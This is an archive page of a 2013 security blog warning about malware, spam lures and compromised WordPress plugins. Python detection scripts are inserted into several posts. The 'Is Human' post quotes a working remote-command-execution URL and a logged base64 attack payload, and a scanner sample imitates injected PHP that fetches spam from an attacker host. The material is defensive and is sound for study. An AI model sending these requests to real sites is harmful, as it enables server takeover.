Showing posts with label warning.

Wednesday, June 12, 2013

Super Malware that Attacks Android Discovered

Android and security threats go almost hand in hand, as new and imminent threats are discovered on almost a weekly basis in today’s market. Until now, however, no threat has been able to uproot Google’s Android as one of the most popular mobile operating systems in the world. That may be about to change: a new, very advanced virus has been detected that attacks the Android operating system in a new and innovative way. The code is also difficult to remove completely, and could deter users from using Android in the future.

Deadly Characteristics of the Virus


When a security researcher assesses a piece of malicious software, he or she considers its most dangerous traits. From that viewpoint, this is one of the most dangerous pieces of Android malware yet discovered. Firstly, the code is so complex that it looks almost like code written for a Windows computer, or even more advanced. The code also uses obfuscation techniques to hide its true nature from the OS and thereby evade detection. But the most dangerous trait of this malware is that it has been programmed to resist the user’s attempts to uninstall it.

Kaspersky Labs behind the Discovery


Kaspersky, a leading security products company, detected this malware on Android and said that it has the capability of single-handedly bringing down the Android operating system. They also reported that this malware exploits vulnerabilities in the Android OS that were previously unknown.

References:

Android super-malware discovered – Is Google's platform in peril? (virusfreephone.com/.../android-super-malware-discovered-is-googles-pla...)

Android super-malware discovered – Is Google's platform in peril? (malware.rsspump.com/?...android-super-malware-discovered--is...)

Tuesday, May 28, 2013

Security Flaw Found in Facebook Pages Manager App for Android

Facebook Patches Privacy Flaw In Pages Manager For Android (Android Police)
www.androidpolice.com/.../serious-privacy-flaw-in-facebook-pages-man...

Over the weekend, Android Police received a tip about a serious privacy hole in Facebook Pages Manager for Android that made some privately uploaded photos public. Shortly after the details of this issue went public, Facebook Security got in touch ... a fix had been rolled out server-side, and no app update was necessary.

Update 5/26/13 11:30pm PT: Rory from Facebook Security has informed ...

Privacy Flaw Found in Facebook Pages Manager for Android (Softpedia News)
news.softpedia.com

Flaw in Facebook Pages Manager for Android makes your private messages public (Tech2)
http://tech2.in.com/news/android/flaw-in-facebook-pages-manager-for-android-makes-your-private-messages-public/874420


If you have Facebook’s Pages Manager application installed on your Android device to access your pages at any time of the day, you need to beware. If you plan on sending an image as a private message to a fan of your page, chances are that the image will get posted onto your wall for all your fans to see.

Thursday, May 23, 2013

Microsoft Issues Worldwide Virus Alert

Talk of computer viruses, and their footprint in the online world, had reduced significantly in the last year. Hackers and online miscreants had moved on to other methods of attacking computers, as viruses were considered too weak. But Microsoft recently announced that the trend is set to change in the coming days. A security expert from the IT giant said that hackers were reverting to the use of viruses and coming up with innovative attack vectors. He said that this year the world will witness a significant increase in the use of viruses to attack computers (both personal and corporate).

Low Broadband Penetration Rate


Tim Rains, the security expert who announced the news, said that Microsoft was monitoring the virus trends on the World Wide Web and noticed a spike in the volume of viruses for the first time. He said that low broadband penetration rate has increased the chances of a computer getting infected with any of the malicious software, including Trojans and worms. He said that this trend is being exploited by hackers and they are using viruses more actively to infect broadband connected computers (which is almost every internet enabled computer today). Microsoft also added that they had traced the infections to as far as Egypt, Pakistan, and Bangladesh.

Viruses Are Easy to Eliminate


Rains said that even today, viruses are very easy to remove, as their signatures can be easily detected and tracked. He said that users are expected to keep their anti-virus systems updated, which will significantly reduce the chances of being attacked by a virus.

[via NBC News ]

Malware Threat to ATMs

Malware has been a big threat to computers, and this type of malicious software has caused a lot of problems. As if that were not enough, a forensics and security threat firm has announced that malware can be used to target ATMs. Group-IB, the firm that announced these findings, said that malware can be used to collect data from ATMs or card-swiping machines and break into bank accounts. According to the study, the malware stores the data and sends it to the hacker who planted it whenever a network connection is available for transmission.

A Few Researchers Disagree


While Group-IB discussed their findings, the Director of Research at the University of Alabama, Gary Warner, said that malware cannot be used in the way Group-IB is announcing. He said that ATM networks are secured at multiple levels and something as simple as malware cannot get through the layers of encryption and firewalls. Typically, malware tries to exploit the weaknesses in the security that protects a system.

Bank Networks Vulnerable from Inside


Warner added that banks don’t have to worry about attacks from the outside. He said that banks should worry more about someone on the inside planting malicious software into the bank networks, as that is where the vulnerability is highest. He said that auto-loading malware can be inserted as easily as plugging a USB drive into a computer. The jury is still out on whether malware can affect banks from the outside or not, but the question is how severe the repercussions will be if malware does attack a bank network.

[via Bank Info Security]

Wednesday, April 24, 2013

Malware Distributed from Phony SourceForge Website

Make sure you double-check the URL in your browser’s address bar or dialog window before downloading files online.

Zscaler researchers discovered that cybercriminals were taking advantage of the trusted reputation of SourceForge[.net] by distributing malware through a look-alike domain, sourceforgetchile.net.

The malicious file analyzed by Zscaler, minecraft_1.3.2.exe, posed as a file associated with the popular game Minecraft, as the name suggests.

In reality, the executable was a piece of malware closely related to the ZeroAccess Trojan that, upon successful infection, hides in the Recycle Bin, injects malicious code into running processes, recruits the computer into a botnet, and generates revenue for its operators by taking part in click fraud.

Thankfully this threat has a high detection rate (32/46), according to a VirusTotal report. So in the event that you downloaded the Trojan, you can perform a full system scan using one of the many AV programs capable of finding & removing it.

Aside from that, stay vigilant & always double-check the URL before clicking 'Download'.

[via Zscaler]

Thursday, April 18, 2013

Texas Plant Explosion Spam Leads to Malware Attack

Considering cybercriminals jumped on the opportunity to spread malware by sending spam related to Monday’s Boston Marathon bombing, it’s not all that surprising that they’re now doing the same with yesterday’s fertilizer plant explosion in West, Texas.

Here are some of the subject lines to watch out for:

  • West TX Explosion

  • Waco Explosion HD

  • Texas Plant Explosion

  • Texas Explosion Injures Dozens

  • CAUGHT ON CAMERA: Fertilizer Plant Explosion Near Waco, Texas

  • Raw: Texas Explosion Injures Dozens


Like the marathon-themed emails, the spam messages tied to the new fertilizer plant explosion trick users into following malicious links by promising video footage of the devastating event.

[Image: Texas explosion spam email. Image credit: Sophos]


While it’s true that the victim is presented with a series of embedded videos related to the incident, they are also being exposed to the Redkit exploit kit, which uses Adobe PDF or Java vulnerabilities to silently install malware on the victim’s computer.

Avoiding these attacks should be relatively easy – don’t follow links in unsolicited emails. Aside from that, keeping your operating system (& installed software) up-to-date and running antivirus software should help your PC remain malware-free.

Have you received any suspicious emails related to the plant explosion or marathon bombing? Share your experiences below and get the word out to help protect others!

[via Sophos][via AppRiver]

Don’t miss out on the latest tech news and computer security alerts! Follow us on Twitter at @hyphenet,  “Like” us on Facebook or add us to your circle on Google+

Wednesday, April 17, 2013

Spammers Exploit Boston Marathon Bombing to Spread Malware

Click with caution if you receive unsolicited emails, or find yourself wanting to click a website link, related to the deadly bombing attack at the Boston Marathon on Monday.

Antivirus firms Avira and Sophos, along with email security provider AppRiver, have already intercepted emails from spammers aspiring to dupe users into following malicious links by offering video footage of the attacks.

There are a variety of domain names and subject lines associated with this spam campaign; some of the subject lines in use are:

  • Explosion[s] at Boston Marathon

  • Boston Explosion Caught on Video

  • Aftermath to explosion at Boston Marathon

  • Video of Explosion at the Boston Marathon 2013

  • Runner captures. Marathon Explosions

  • 2 Explosions at the Boston Marathon


The body of the email appears to contain nothing more than a link pointing to a website that has legitimate videos from the attack. However, that same site is rigged with malicious code that will attempt to exploit Java plugin vulnerabilities in order to drop a backdoor Trojan on your machine.

Avira identifies the threat as TR/Crypt.ZPACK.Gen, while Sophos identifies it as Troj/Tepfer-Q.

Upon a successful infection, TR/Crypt.ZPACK.Gen (or Troj/Tepfer-Q) will modify the system registry and connect to a remote server, granting an attacker remote access to the affected PC.

Tips to Keep Your PC Safe


Avira warns that malicious links may also be posted on Facebook, so users should also exercise caution when following links shared on social networks. Here are a few other bits of advice to help keep your computer malware-free:

  • Do not click links or download files attached to unsolicited emails.

  • Stick to the official websites of your favorite news channel to get the latest updates.

  • Keep your operating system and installed third-party software fully patched and up-to-date.

  • Always run antivirus software and keep the virus definitions current.


Did You Already Fall for It?


Both Avira and Sophos offer security products capable of detecting and removing the malware being spread by these online attacks. So if you have the sinking feeling that you may have followed a bad link, you may want to try performing a full system scan using one of their products.

Friday, April 12, 2013

American Airlines Spam Spreads Backdoor Trojan

Webroot is cautioning users not to fall for spam emails posing as a notification from American Airlines stating that their ticket is all set and ready for download.

This spam campaign isn’t exactly new, although previous versions may have had malicious files attached directly to the email itself.

Here’s what the current variant looks like:

American Airlines

Customer Notification

Your bought ticket is attached to the letter as a scan document.

To use your ticket you should Download It.

The embedded link prompts users to download an executable, “Electronic Ticket.exe”, which only 10 of 46 antivirus engines identify as malware.

Dr. Web antivirus detects the threat as BackDoor.Kuluoz.4. Once it has infected your system, BackDoor.Kuluoz.4 will modify system files, inject itself into system processes and connect to a list of command & control servers.

Did You Get this Spam Email?


If you received a copy of this spam email, it is advised that you:

  • Do not click on any links within the email.

  • Do not download any files that may be attached or linked from this email.

  • Forward a copy of the email, including the headers, to webmaster@aa.com.

  • Delete the email immediately.


If You Downloaded Any Files...


If you made the mistake of clicking the link or opening any files attached to spam emails resembling the one above, you are advised to perform a full system scan using an antivirus solution offered by one of the following vendors:

Their products are capable of detecting and removing the threat associated with this attack. Be sure to be more careful in the future!

Check Your WordPress Plugins: Social Media Widget Found to be Injecting Spam into Websites

WordPress website masters are being advised to update (or remove) the Social Media Widget plugin following the discovery that it was being misused to inject spam into the websites it was installed on.

According to Sucuri Security, the malicious code, which calls the URL hxxp://i.aaur.net/i.php to inject “Pay Day Loan” spam links into the affected website, was added in version 4.0 of the plugin, released about 2 weeks ago.

A thread on the plugin’s support forums reveals that the compromise was a result of the owner trusting the wrong developer.

The Social Media Widget plugin was removed from the WordPress Plugin repository after it was found to have been tampered with, but has since been reinstated following removal of the bad code in version 4.0.1.

However, the plugin is quite popular, and there’s no telling how many of the 900k websites on which it had already been installed are still at risk.
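One way a site owner can review a plugin after an update like this, given here as an added example that is not Sucuri’s tooling or the plugin’s own code: scan every PHP file in the plugin directory for calls that fetch or include content by URL, and list those whose host is not on an allow-list. The allow-list, the function names, and the PHP sample (which imitates the injected pattern using the URL named above) are assumptions constructed for the example.

```python
"""List remote-fetch calls in WordPress plugin source.

Added example; not Sucuri's tooling and not the plugin's code. After a
plugin update, the review question is: which lines pull content from
hosts I did not expect? The allow-list and the PHP sample below are
constructed assumptions.
"""
import re
import sys
from pathlib import Path

# Hosts a plugin may legitimately contact (assumed allow-list; tune it).
ALLOWED_HOSTS = {"api.wordpress.org", "downloads.wordpress.org"}

# A fetch/include function name followed, before the end of the statement,
# by a quoted http(s) URL in its argument list.
FETCH_RE = re.compile(
    r"\b(?P<func>file_get_contents|fopen|curl_init|curl_setopt|"
    r"wp_remote_(?:get|post|request)|include(?:_once)?|require(?:_once)?)(?!\w)"
    r"[^;]*?['\"](?P<url>https?://[^'\"\s]+)",
    re.IGNORECASE,
)

# Constructed PHP resembling the injected pattern (not the real plugin code).
SAMPLE_PHP = """\
<?php
// footer hook
function smw_footer() {
    $links = file_get_contents('http://i.aaur.net/i.php?u=' . urlencode($_SERVER['HTTP_HOST']));
    echo $links;
}
$info = wp_remote_get("https://api.wordpress.org/plugins/info/1.0/social-media-widget.json");
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://203.0.113.5/ads.txt");
"""


def host_of(url: str) -> str:
    """Extract the lower-cased host from an http(s) URL (drops userinfo/port)."""
    return url.split("/", 3)[2].split("@")[-1].split(":")[0].lower()


def remote_fetches(source: str, filename: str = "<string>") -> list:
    """Return fetch/include calls whose URL host is outside ALLOWED_HOSTS."""
    findings = []
    for line_no, line in enumerate(source.splitlines(), 1):
        for m in FETCH_RE.finditer(line):
            host = host_of(m["url"])
            if host not in ALLOWED_HOSTS:
                findings.append({"file": filename, "line": line_no,
                                 "func": m["func"].lower(), "host": host})
    return findings


def scan_plugin_dir(root: Path) -> list:
    """Apply remote_fetches to every .php file under a plugin directory."""
    findings = []
    for php in sorted(root.rglob("*.php")):
        findings.extend(remote_fetches(php.read_text(errors="replace"), str(php)))
    return findings


if __name__ == "__main__":
    if len(sys.argv) > 1:
        results = scan_plugin_dir(Path(sys.argv[1]))   # e.g. wp-content/plugins/<name>
    else:
        results = remote_fetches(SAMPLE_PHP, "social-media-widget.php")
    for f in results:
        print(f"{f['file']}:{f['line']}: {f['func']} -> {f['host']}")
```

Run it with a plugin directory as the argument; with no argument it scans the constructed sample. Every hit deserves a look, not a verdict: legitimate plugins also call home, which is exactly why the allow-list exists.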

If you have the Social Media Widget plugin installed on your WordPress website, it is strongly advised that you:

Thursday, April 4, 2013

Watch Out for Fake HP Printer Scan Emails

Keep an eye out for fraudulent emails claiming that a document was scanned and sent to you from your office Hewlett-Packard ScanJet printer.

Sophos warns that spammers are once again sending out bogus scan-to-email notices in an attempt to dupe users into clicking malicious links that lead to websites serving malware.

Subject: Fwd: Re: Scan from a Hewlett-Packard ScanJet #1788378

A document was scanned and sent to you using a Hewlett-Packard HP9289197

Sent to you by: PEARLIE
Pages: 3
Filetype(s): Images (.jpeg) View

This isn’t the first time that spammers mimicked document-to-file scan notifications, but previous attempts involved malicious file attachments vs. links in the email itself.

The malware served in the attack was not disclosed; however, the websites associated with this attack are rigged with the BlackHole exploit kit, which typically leverages PDF, Flash & Java vulnerabilities in order to plant malware on the visiting machine.

So, keep your computer safe by:

  • Not following links embedded in unsolicited emails – at least not without investigating them first.

  • Running antivirus software that offers real-time scanning & keep the virus definitions current. (Btw, Sophos blocks the page as Mal/ExpJS-N.).

  • Keeping your operating system and third-party software fully patched & up-to-date.


If you’ve already clicked the link, run a full system scan to detect & remove any potential malware that may have been installed on your computer.

Wednesday, April 3, 2013

Spyware Uses Fake Facebook Page to Steal Credit Card Data

It’s time to scan your computer for malware if you try to visit Facebook.com and land on a "security check" page requesting that you enter your credit card information to “verify your account.”

Spyware that TrendMicro researchers identify as TSPY_MINOCDO.A tricks unsuspecting users into disclosing their financial information by redirecting them to a spoofed Facebook security check page every time they attempt to visit the social networking site.

The redirect is done through the infected machine’s HOSTS file, and it prevents the user from accessing any legitimate Facebook pages until the malware is removed.
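A quick check for this kind of tampering, written here as an added example (it is not TrendMicro’s tooling and not code from the original post): the script parses the hosts file, ignores comments, and reports any watch-listed name that is mapped to a non-loopback address. The watch-list and the sample hosts content are constructed for the example; the Windows and Unix hosts-file paths are the standard locations.

```python
"""Check a hosts file for hijacked entries.

Added example, not from TrendMicro's write-up or the original post.
A name on the watch-list mapped to a non-loopback address is the redirect
pattern described for TSPY_MINOCDO.A; a loopback mapping merely blocks
the site and is reported separately.
"""
import ipaddress
import platform
from pathlib import Path

# Names that should never be overridden locally (assumed watch-list; extend
# it with whatever services your users log in to).
WATCHLIST = frozenset({"facebook.com", "www.facebook.com", "login.facebook.com"})

# Constructed sample of a tampered hosts file.
SAMPLE_HOSTS = """\
# Copyright (c) 1993-2009 Microsoft Corp.
127.0.0.1       localhost
::1             localhost
192.0.2.55  facebook.com www.facebook.com   # injected entry
127.0.0.1   mysite.local
"""


def default_hosts_path() -> Path:
    """Standard location of the hosts file on the current platform."""
    if platform.system() == "Windows":
        return Path(r"C:\Windows\System32\drivers\etc\hosts")
    return Path("/etc/hosts")


def parse_hosts(text: str):
    """Yield (ip, hostname, line_no) for each mapping; comments are stripped."""
    for line_no, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        ip, *names = line.split()
        try:
            ipaddress.ip_address(ip)
        except ValueError:
            continue  # first field is not an address; skip malformed line
        for name in names:
            yield ip, name.lower().rstrip("."), line_no


def find_hijacks(text: str, watchlist=WATCHLIST) -> list:
    """Return watch-listed names found in the file, tagged redirect or block."""
    hits = []
    for ip, name, line_no in parse_hosts(text):
        if name not in watchlist:
            continue
        addr = ipaddress.ip_address(ip)
        kind = "block" if addr.is_loopback or addr.is_unspecified else "redirect"
        hits.append({"line": line_no, "host": name, "ip": ip, "kind": kind})
    return hits


if __name__ == "__main__":
    path = default_hosts_path()
    sources = [("sample", SAMPLE_HOSTS)]
    if path.exists():
        sources.append((str(path), path.read_text(errors="replace")))
    for label, text in sources:
        for hit in find_hijacks(text):
            print(f"{label} line {hit['line']}: {hit['host']} -> {hit['ip']} ({hit['kind']})")
```

The script needs read access to the real hosts file, which is world-readable on most systems; removing an injected entry is a separate step that should follow the malware clean-up, since the malware can simply rewrite it.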

Please complete a security check

Security checks help keep Facebook trustworthy and free of spam.

Use a credit card to verify your account

To keep Facebook a safe environment and to make sure that you are using your real name, we require you to confirm your identity by submitting your credit card information.

- This information will only be used to verify your identity.
- Your credit card will not be charged in any way.
- We do not store any credit card information on our servers.
- Please enter the following information to be able to continue using your Facebook account.

Information submitted through the false Facebook page is sent back to the cybercriminals to use as they please.

Aside from stealing payment information, researchers say that TSPY_MINOCDO.A modifies the system registry to ensure it starts every time Windows does, performs DNS queries to multiple domains to ensure that it can report back to its command server, and monitors all browsing activity.

TSPY_MINOCDO.A is distributed via drive-by-download attacks and other malware, so users can protect their computers by:

  • Keeping their operating system and installed software fully patched and up-to-date.

  • Always running antivirus software and keeping the virus definitions current.

  • Exercising caution when following hyperlinks (do a little research first!).

  • Disabling Java in their browser if it is not needed (the Java browser plugin is often targeted in cyberattacks).


Above all else, trust your instincts and don’t hand out your credit card information to “verify” your account on a FREE social networking website.

Tuesday, April 2, 2013

Malware Steals Credit Card Data from POS Systems & ATMs

Several hundred POS terminals and ATMs in the United States have been infected by malware designed to steal debit and credit card data, according to security firm Group-IB.

The malware, named “Dump Memory Grabber” is written in C++ without the use of any additional libraries and is capable of collecting Track 1 and Track 2 card data (full name, account number, expiration date, etc.) from infected systems – providing fraudsters all the information they need to create physical card clones.

Upon infection, Dump Memory Grabber modifies the system registry to ensure it runs whenever the affected machine boots, lists all running processes and proceeds to search memory for sensitive payment information. The stolen data is then uploaded via FTP to a remote server believed to be controlled by Russian cybercriminals affiliated with a “big cyber-crime gang.”

The malware is said to have siphoned data associated with debit and credit cards issued by major U.S. banks like Chase, Capital One, Citibank and Union Bank of California.

Group-IB told Security Week that most of the POS terminals and ATMs appear to have been infected with the help of insiders, such as employees with physical access to the machine or authorization to update system software. Only a handful of systems running Windows XP or Windows Embedded appeared to have been compromised remotely. In some cases, attackers were also able to exploit vulnerabilities in the banks’ networks to plant the malware.

Group-IB has shared its findings on Dump Memory Grabber with VISA, the affected banks and law enforcement.

[via Security Week]

Friday, March 29, 2013

Trojan Poses as Flash Player 11 Update, Changes Browser Home Page

Be sure to refer to Adobe’s official website if you’re looking to update Flash Player to the latest version.

There’s a Trojan parading around as a Flash Player 11 update, waiting for the opportunity to sneak onto your computer and change your browser’s home page.

Trojan:Win32/Preflayer.A does its best to trick the unsuspecting end-user by arriving under the name ‘FlashPlayer.exe’ and displaying the following installer window when executed:

[Image: fake Flash Player 11 installer window]

While it's not entirely clear why two languages are used (Turkish/English), the agreement being displayed without a scrollbar makes sense, since there's a disclaimer at the bottom stating that your browser’s home page will be changed to one of the following upon installation:

  • www.anasayfada.net

  • www.heydex.com


“These sites appear to be a type of search engine, but there are pop-up advertisements displayed on the pages, and there was an instance where I was redirected to a different page not of my choosing,” Jonathan San Jose revealed on Microsoft’s TechNet Blog.

Thankfully, driving traffic to these websites appears to be the main goal. Once the user continues the installation, the fake installer downloads and executes a legitimate Flash Installer and changes the home page in Firefox, Chrome, Internet Explorer and Yandex, as promised.

Microsoft has already received over 70,000 reports of this malware in the last week, but given that it is posing as a fake Flash Update, avoiding it should be relatively easy.

  • Only download Flash Updates from adobe.com, and not some random website.

  • Pay attention when installing software, and cancel the installer if anything seems amiss (like the missing scrollbar).


Is Your Computer Infected?


To remove Trojan:Win32/Preflayer.A from your computer, perform a full system scan using antivirus provided by one of the following vendors:

  • Microsoft 

  • McAfee

  • AVG

  • Ikarus


Just keep in mind that additional steps may need to be taken to change your home page in Internet Explorer.

Thursday, March 28, 2013

Malware Uses Evernote as Command & Control Server

TrendMicro researchers have recently stumbled upon a piece of malware that uses the popular note-taking service Evernote as its command and control server.

The malware, which TrendMicro detects as BKDR_VERNOT.A is classified as a backdoor, and grants an attacker remote access to an infected system to do as they please.

“The sample we gathered consists of an executable file, which drops a .DLL file and injects it into a legitimate process,” Threat Response Engineer Nikko Tamana explained on the TrendMicro blog. “The said .DLL file performs the actual backdoor routines.”

Aside from downloading and executing additional files, those backdoor routines include collecting information about the infected system, such as the OS, timezone, user name, computer name, registered owner and organization.

TrendMicro researchers found that commands were retrieved from the notes saved in an Evernote account, which is also suspected to be the location where the stolen data is unloaded.

This is not the first time that malware authors have abused a legitimate service to relay information and evade detection. Twitter and Google Docs are two other services that have been used by malware in the past.

Keeping Your System Safe


BKDR_VERNOT.A is spread via drive-by-download and other malware, so users can minimize their chances of infection by:

  • Keeping their operating system and installed third-party software fully patched and up-to-date.

  • Running antivirus software with the latest virus definitions.

  • Exercising caution when following suspicious hyperlinks (even if they appear to be harmless image links).

  • Scanning email file attachments before downloading and/or opening them.


Thursday, March 21, 2013

Yontoo Trojan Installs Adware Browser Plugins to Inject Ads in Webpages

Russian antivirus vendor Dr. Web is warning OS X users about a new Trojan, detected as Trojan.Yontoo.1 (“Yontoo”), that installs adware browser plugins on whatever computer it manages to infect.

Users are often duped into downloading Yontoo after landing on a movie trailer page that prompts them to download & install a [missing] browser plugin, media player, video quality enhancement program or download accelerator.

When launched, Yontoo displays a dialog window asking the victim to install a program called “Free Twit Tube”:

[Image: Yontoo prompts the user to install Free Twit Tube]

However, Yontoo proceeds to download and install adware plugins for Safari, Chrome and Firefox instead.  As users surf the web, the plugins relay browsing data to a remote server, which then returns a file that enables the Trojan to inject ads (via third-party code) into webpages loaded in the affected browser.

So, for example, when a user visits apple.com on an infected machine, they may see something like this:

[Image: ads injected by the Yontoo Trojan into apple.com]

While Dr. Web’s write-up focuses on the attack targeting OS X users, it is important to note that Windows users are also subject to Yontoo infections, although Symantec classifies Yontoo as a “potentially unwanted app” vs. Trojan (an app that claims to be one thing when it’s another).

Either way, the ol’ “missing plugin” bit is rather old, so don’t fall for it. Be careful what you install on your computer, and always read the installation dialogs.

Removing Yontoo from Your PC


If you’ve already been tagged by the Yontoo Trojan, you can perform a full system scan using one of the following antivirus programs to remove the infection:

Old "Is Human" WordPress Plugin Still on Cybercriminals' Hit List

Just because something isn’t readily available anymore doesn’t necessarily mean that someone isn’t out there searching for it.

Take the “Is Human” WordPress plugin, for example.

It’s no longer available for download, no longer supported by its developers, and yet cybercriminals are still scanning websites hoping that someone still has it installed.

Why? Because versions 1.4.2 and earlier suffer from a remote command execution vulnerability. Below is a write-up from the corresponding exploit-db entry:

The vulnerability exists in /is-human/engine.php.

It is possible to take control of the eval() function via the 'type' parameter, when the 'action' is set to log-reset. From here we can run our own code.

In order to avoid any errors we point the $is_hum->get_* array variable into $is_hum->get_ih and to close the execution without error we point it to php stored function error_log(). In between we may place our own php code and use the passthru() function to execute commands.

Execution running the linux whoami command:

http://server/wp-content/plugins/is-human/engine.php?action=log-reset&type=ih_options();passthru(whoami);error

We recently experienced attempts to exploit said vulnerability on our website, all of which failed because we don't use this plugin - not to mention they used the incorrect filepath. All attempts originated from the same (U.S.-based) IP address:

/blog/2013/02/01/hackers-still-scanning-for-vulnerable-timthumb-scripts/wp-content/plugins/is-human/engine.php?action=log-reset&error&eval(base64_decode(JHM9cGhwX3VuYW1lKCk7CmVjaG8gJzxicj4nLiRzOwoKZWNobyAnPGJyPic7CnBhc3N0aHJ1KGlkKTsK))&type=ih_options()

The base64-decoded text is:
$s=php_uname();
echo '<br>'.$s;

echo '<br>';
passthru(id);

Obviously this post serves as a warning to anyone that may still have this plugin installed on their WordPress website. Cybercriminals will attempt to exploit any vulnerability – old or new – to cause mischief and mayhem.

WordPress is a popular CMS, and it’s important that anyone running it keeps the platform and any installed plugins up-to-date.
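For anyone reviewing their own access logs for the probes described above, here is an added example of the detection logic (it is not part of the original post and not the plugin’s code): it matches requests for is-human/engine.php, records the action=log-reset parameter and any PHP function names in the query string, and decodes a base64_decode() argument so the payload can be read during triage. The log lines are constructed; two of them reuse the query strings quoted in the post, the third is ordinary traffic.

```python
"""Flag probes against the Is Human plugin in web-server access logs.

Added example, not part of the original post. Works on combined-format
log lines; the sample lines are constructed, with the two probe requests
reusing the query strings quoted in the post.
"""
import base64
import binascii
import re
from typing import Optional
from urllib.parse import parse_qs, unquote

# Enough of the Apache/nginx combined log format for our purpose.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)
# PHP calls that have no business appearing in a query string.
SUSPICIOUS = ("eval(", "passthru(", "base64_decode(", "system(", "exec(", "shell_exec(")
B64_RE = re.compile(r"base64_decode\(\s*['\"]?([A-Za-z0-9+/=]+)['\"]?\s*\)")

SAMPLE_LOG = [
    '198.51.100.7 - - [20/Mar/2013:10:12:01 -0700] "GET /blog/2013/02/01/hackers-still-scanning-for-vulnerable-timthumb-scripts/wp-content/plugins/is-human/engine.php?action=log-reset&error&eval(base64_decode(JHM9cGhwX3VuYW1lKCk7CmVjaG8gJzxicj4nLiRzOwoKZWNobyAnPGJyPic7CnBhc3N0aHJ1KGlkKTsK))&type=ih_options() HTTP/1.1" 404 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [20/Mar/2013:10:12:02 -0700] "GET /wp-content/plugins/is-human/engine.php?action=log-reset&type=ih_options();passthru(whoami);error HTTP/1.1" 404 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [20/Mar/2013:10:15:44 -0700] "GET /blog/2013/02/01/some-post/ HTTP/1.1" 200 8192 "-" "Mozilla/5.0"',
]


def decode_b64(blob: str) -> Optional[str]:
    """Decode a base64 blob tolerantly; probes often omit the '=' padding."""
    blob += "=" * (-len(blob) % 4)
    try:
        return base64.b64decode(blob, validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None


def analyse_line(line: str) -> Optional[dict]:
    """Return a finding for a request aimed at engine.php, otherwise None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    target = unquote(m["target"])          # decode %xx; '+' is left alone
    path, _, query = target.partition("?")
    if "is-human/engine.php" not in path:
        return None
    params = parse_qs(query, keep_blank_values=True)
    b64 = B64_RE.search(query)
    return {
        "ip": m["ip"],
        "ts": m["ts"],
        "status": int(m["status"]),
        "log_reset": "log-reset" in params.get("action", []),
        "tokens": [t for t in SUSPICIOUS if t in query],
        "payload": decode_b64(b64.group(1)) if b64 else None,
    }


def scan_log(lines) -> list:
    """Findings for every line that targets the plugin, in log order."""
    return [f for f in (analyse_line(ln) for ln in lines) if f]


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} status={f['status']} "
              f"log_reset={f['log_reset']} tokens={f['tokens']}")
        if f["payload"]:
            print("  decoded payload:\n    " + f["payload"].replace("\n", "\n    "))
```

A 404 on these requests, as in the sample, means the plugin path does not exist, so the probe failed; the same finding with a 200 status against a site that still has the plugin installed is the one that needs follow-up.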

Tuesday, March 19, 2013

Watch Out for Mobile Adware Posing as Candy Crush Saga Apps

Think twice before you download apps that claim to offer cheats or guidance for the popular matching game, Candy Crush Saga.

TrendMicro warns that ill-willed developers have started cashing in on the game's popularity by creating fake Candy Crush apps containing the code for the Leadbolt & AirPush ad networks.

AirPush and Leadbolt have gained quite a poor reputation for their “aggressive marketing practices,” which include placing ads in the notification/status bar, placing ad-enabled search icons on your mobile desktop, and collecting user information.

In fact, these ad networks (and a few others) have become such a nuisance that developers and mobile security app vendors have released apps capable of detecting their presence, so users can determine which apps are displaying ads on their device (and need to be removed).

TrendMicro’s mobile security app detects the AirPush & Leadbolt ad networks as ANDROIDOS_AIRPUSH.HRXV and ANDROIDOS_LEADBLT.HRY, respectively.

How to Avoid Candy Crush Saga-Themed Adware


As a fan of Candy Crush Saga, I can tell you that a large part of the game relies on luck, so those “cheats” and guides won’t be of much use since the candies aren’t laid out in a specific pattern.  You’ll have to figure it out on your own.

Aside from that, you can gauge the safety of an app by:

  • Checking the number of downloads and the app’s rating.

  • Reading user reviews – usually users will spill the beans on what’s really going on with an app.

  • Doing a little homework on the developer – i.e. Google their name and make sure there aren’t any red flags in the results.

  • Reviewing the app permissions – sometimes the permissions can be hard to gauge (as some legitimate apps require odd permissions), but other times they can throw a big red flag. Either way, look them over and listen to your gut if something seems off.
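The permission review in the last bullet can be scripted for a batch of apps. The following is an added example, not code from Trend Micro or from the post: it takes an AndroidManifest.xml decoded with apktool, lists the permissions that match the behaviour described above (notification ads, home-screen icons, data collection), and looks for components whose class names start with assumed ad-SDK package prefixes. The prefixes com.airpush. and com.pad.android., the scoring rule and both sample manifests are assumptions or constructed for the example.

```python
import xml.etree.ElementTree as ET

ANDROID = "{http://schemas.android.com/apk/res/android}"

# Permissions an ad SDK needs for the behaviour the post describes. None is damning
# on its own; a "cheat guide" that asks for most of them is the signal.
AD_SDK_PERMISSIONS = {
    "android.permission.INTERNET": "fetch ads / report back",
    "android.permission.READ_PHONE_STATE": "read device identifiers",
    "android.permission.ACCESS_COARSE_LOCATION": "approximate location",
    "android.permission.ACCESS_FINE_LOCATION": "precise location",
    "android.permission.GET_ACCOUNTS": "account names on the device",
    "android.permission.RECEIVE_BOOT_COMPLETED": "start at boot",
    "com.android.launcher.permission.INSTALL_SHORTCUT": "drop icons on the home screen",
}

# Assumed package prefixes for the two SDKs named in the post; maintain as indicators.
AD_SDK_PREFIXES = ("com.airpush.", "com.pad.android.")


def triage_manifest(manifest_xml, prefixes=AD_SDK_PREFIXES):
    """Summarise a decoded AndroidManifest.xml: ad-style permissions and SDK components."""
    root = ET.fromstring(manifest_xml)
    requested = [e.get(ANDROID + "name") for e in root.iter("uses-permission")]
    flagged = {p: AD_SDK_PERMISSIONS[p] for p in requested if p in AD_SDK_PERMISSIONS}
    components = []
    for tag in ("activity", "service", "receiver"):
        for e in root.iter(tag):
            name = e.get(ANDROID + "name") or ""
            if name.startswith(prefixes):
                components.append((tag, name))
    # Assumed scoring: each flagged permission counts 1, each SDK component counts 2.
    score = len(flagged) + 2 * len(components)
    if components:
        verdict = "ad SDK present"
    elif score >= 3:
        verdict = "review permissions"
    else:
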